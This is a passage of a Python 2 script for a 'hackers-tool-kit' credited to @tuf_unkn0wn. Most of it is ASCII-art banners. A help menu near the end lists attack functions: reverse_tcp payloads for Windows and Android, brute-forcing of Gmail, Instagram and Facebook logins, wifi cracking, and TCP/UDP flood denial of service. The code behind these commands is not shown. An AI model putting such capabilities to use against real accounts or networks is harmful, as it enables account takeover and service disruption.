,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,18) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m 